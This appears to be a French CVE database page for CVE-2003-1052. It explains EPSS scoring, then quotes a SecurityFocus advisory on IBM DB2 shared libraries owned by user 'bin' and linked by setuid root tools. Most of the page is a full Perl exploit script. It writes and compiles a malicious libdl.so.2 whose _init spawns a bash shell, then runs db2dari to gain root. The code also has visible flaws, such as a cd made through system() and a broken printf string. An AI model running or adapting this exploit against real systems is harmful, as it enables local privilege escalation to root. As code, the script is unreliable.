CVE-2003-1052 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/8346/info IBM DB2 ships with a number of shared libraries, stored in a directory owned by the user and group 'bin'. As setuid root utilities are linked to these libraries, their ownership by a user and group of a lower privilege level constitutes a vulnerability. If an attacker can obtain user or group bin privileges, the shared libraries can be overwritten with malicious replacements designed to obtain root privileges from the setuid root utilities that use them. #!/usr/bin/perl #IBM DB2 local root from uid=bin #deadbeat, #e: [email protected] #e: [email protected] print "\nIBM db2 local bin escape to root sploit\n"; print "Preparing exploit...\n"; system("cd /usr/IBMdb2/V7.1/lib"); open FILEHANDLE, (">foo.c")or die "Cant open foo for writing..:(\n"; print FILEHANDLE "#include <stdio.h>\n"; print FILEHANDLE "#include <string.h>\n\n"; print FILEHANDLE "_init() {\n"; print FILEHANDLE "\tprintf(\"init..()\\n\");\n"; print FILEHANDLE "\tprintf(here we go: PID=\%i EUID=\%i\", getpid(), getuid());\n"; print FILEHANDLE "\tsystem(\"/bin/bash\");\n"; print FILEHANDLE "\tprintf(\"wicked done and dusted..\\n\")\n"; print FILEHANDLE "}"; close FILEHANDLE; system("gcc -fpic -shared -o libdl.so.2 foo.c"); exec("db2dari")